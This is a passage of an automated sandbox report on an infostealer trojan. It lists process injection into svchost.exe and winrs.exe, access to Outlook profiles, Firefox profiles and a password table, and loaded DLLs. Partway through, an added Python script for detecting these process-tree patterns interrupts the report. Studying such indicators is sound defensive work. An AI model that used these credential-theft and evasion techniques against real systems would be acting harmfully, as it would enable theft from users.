                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_04429648
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_04420EC5
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_04420ECE
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0442784B
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0442784E
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0441F0CE
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_044210EE
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Code function: 2_2_0441F21E
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345A352
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034603E6
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033AE3F0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03440274
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034202C0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03428158
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03390100
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0343A118
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034581CC
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034541A2
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034601AA
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03432000
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A0770
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033C4750
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0339C7C0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033BC6E0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A0535
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03460591
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03452446
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03444420
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0344E4F6
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345AB40
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03456BD7
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0339EA80
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033B6962
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A29A0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0346A9A6
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033AA840
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A2840
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033868B8
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033CE8F0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03414F40
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033C0F30
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033E2F28
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03442F30
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0341EFA0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03392FC8
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345EE26
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A0E59
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345EEDB
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033B2E90
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345CE93
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033AAD00
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0343CD1F
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033B8DBF
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0339ADE0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A0C00
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03390CF2
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03440CB5
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345132D
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0338D34C
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033E739A
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A52A0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034412ED
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033BD2F0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033BB2C0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0346B16B
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0338F172
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033D516C
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033AB1B0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0344F0CC
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345F0E0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034570E9
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A70C0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345F7B0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033E5630
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034516CC
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03457571
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_034695C3
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0343D5B0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03391460
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345F43F
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345FB76
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03415BF0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033BFB80
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033DDBF9
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03457A46
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345FA49
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03413A6C
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0344DAC6
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033E5AA0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03441AA3
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0343DAAC
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03435910
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A9950
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033BB950
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0340D800
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A38E0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345FF09
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A1F92
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03363FD5
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03363FD2
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345FFB1
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A9EB0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03451D5A
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03457D73
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033A3D40
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_033BFDC0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_03419C32
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0345FCF2
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029C1AE0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029BCA10
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029BCA07
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029BAC10
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029BCC30
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029BAD56
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029BAD60
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029C3390
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029C338D
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029B10A9
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029C5190
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_029DB7E0
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0326E368
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0326E483
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0326CB83
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0326E81D
                Source: C:\Windows\SysWOW64\winrs.exe Code function: 3_2_0326D8E8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0362B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03687E54 appears 107 times
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: String function: 00E9F8A0 appears 35 times
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: String function: 00E96AC0 appears 42 times
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: String function: 00E8EC2F appears 68 times
                Source: C:\Windows\SysWOW64\winrs.exe Code function: String function: 0341F290 appears 103 times
                Source: C:\Windows\SysWOW64\winrs.exe Code function: String function: 033E7E54 appears 107 times
                Source: C:\Windows\SysWOW64\winrs.exe Code function: String function: 033D5130 appears 58 times
                Source: C:\Windows\SysWOW64\winrs.exe Code function: String function: 0340EA12 appears 86 times
                Source: C:\Windows\SysWOW64\winrs.exe Code function: String function: 0338B970 appears 262 times
                Source: KSts9xW7qy.exe, 00000000.00000003.1671955920.00000000041AD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs KSts9xW7qy.exe
                Source: KSts9xW7qy.exe, 00000000.00000003.1672760590.0000000004003000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs KSts9xW7qy.exe
                Source: KSts9xW7qy.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@13/11
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00EBCE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00EAAB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00EAB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00EBE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00EB6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00ECC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Code function: 0_2_00E7406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe File created: C:\Users\user\AppData\Local\Temp\autBCED.tmp
                Source: KSts9xW7qy.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1958451082.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1958451082.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: KSts9xW7qy.exe ReversingLabs: Detection: 71%
                Source: unknown Process created: C:\Users\user\Desktop\KSts9xW7qy.exe "C:\Users\user\Desktop\KSts9xW7qy.exe"
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KSts9xW7qy.exe"
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
                Source: C:\Windows\SysWOW64\winrs.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
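The process tree above is the part of the report a detection engineer can act on directly: a SysWOW64 svchost.exe is created with the dropper's own command line ("C:\Users\user\Desktop\KSts9xW7qy.exe") and with the dropper, not services.exe, as its parent, and winrs.exe (started from a binary under a randomly named Program Files (x86) folder) goes on to launch Firefox. The script below is an added example, not Joe Sandbox code: it runs three rules over hand-constructed process-creation records that mirror those lines. The PIDs, the parent of pTPcvfjkbwUWkD.exe (this section of the report does not show who created it; explorer.exe is assumed) and the allow-list of processes from which a browser launch is considered normal are assumptions.

```python
"""Three process-tree checks over constructed records mirroring this report.

Added example, not Joe Sandbox code. Field names follow Sysmon Event ID 1
(Image, CommandLine, ParentProcessId) but every record below is hand-written.
"""
import ntpath
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    command_line: str


# Constructed records. PIDs are invented; the parent of pTPcvfjkbwUWkD.exe is
# assumed to be explorer.exe because this section of the report does not show it.
FAKE_CHROME = (r"C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC"
               r"\pTPcvfjkbwUWkD.exe")
EVENTS = [
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Users\user\Desktop\KSts9xW7qy.exe",
              r'"C:\Users\user\Desktop\KSts9xW7qy.exe"'),
    # svchost.exe started with the dropper's command line, as in the report
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\svchost.exe",
              r'"C:\Users\user\Desktop\KSts9xW7qy.exe"'),
    ProcEvent(400, 100, FAKE_CHROME, f'"{FAKE_CHROME}"'),
    ProcEvent(500, 400, r"C:\Windows\SysWOW64\winrs.exe", r'"C:\Windows\SysWOW64\winrs.exe"'),
    ProcEvent(600, 500, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Assumption: parents from which a browser start is treated as normal.
EXPECTED_BROWSER_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "userinit.exe"} | BROWSERS


def basename(path: str) -> str:
    """Lower-cased file name; ntpath handles backslashes on any host OS."""
    return ntpath.basename(path).lower()


def cmdline_exe(command_line: str) -> str:
    """File name of the executable named by argv[0] of a Windows command line."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        argv0 = cmd[1:end] if end != -1 else cmd[1:]
    else:
        argv0 = cmd.split(None, 1)[0] if cmd else ""
    return basename(argv0)


def analyse(events):
    """Return (pid, rule, detail) tuples for every record that trips a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_img = basename(parent.image) if parent else ""
        # Rule 1: argv[0] names a different executable than the one running.
        # In the report svchost.exe runs with "C:\Users\user\Desktop\KSts9xW7qy.exe".
        claimed = cmdline_exe(e.command_line)
        if claimed and claimed != img:
            findings.append((e.pid, "cmdline_image_mismatch",
                             f"{img} runs with the command line of {claimed}"))
        # Rule 2: a genuine svchost.exe is a child of services.exe.
        if img == "svchost.exe" and parent_img != "services.exe":
            findings.append((e.pid, "svchost_unexpected_parent",
                             f"svchost.exe spawned by {parent_img or 'unknown'}"))
        # Rule 3: a browser launched by something that does not normally launch browsers.
        if img in BROWSERS and parent_img not in EXPECTED_BROWSER_PARENTS:
            findings.append((e.pid, "browser_unexpected_parent",
                             f"{img} spawned by {parent_img or 'unknown'}"))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in analyse(EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

Run as-is it reports pid 300 twice (command-line/image mismatch and non-services.exe parent) and pid 600 once (Firefox started by winrs.exe). Rule 1 is the cheapest of the three to deploy on real Sysmon or EDR telemetry, since argv[0] of a legitimately started Windows binary names that binary; the allow-list in rule 3 is where a production version needs tuning.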
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\KSts9xW7qy.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: wsmsvc.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: dsrole.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: pcwum.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\winrs.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\winrs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\winrs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: KSts9xW7qy.exe Static file information: File size 1207296 > 1048576
                Source: KSts9xW7qy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: KSts9xW7qy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: KSts9xW7qy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: KSts9xW7qy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: KSts9xW7qy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: KSts9xW7qy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: KSts9xW7qy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3519820185.000000000060E000.00000002.00000001.01000000.00000004.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3519916221.000000000060E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: KSts9xW7qy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: KSts9xW7qy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: KSts9xW7qy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: KSts9xW7qy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: KSts9xW7qy.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
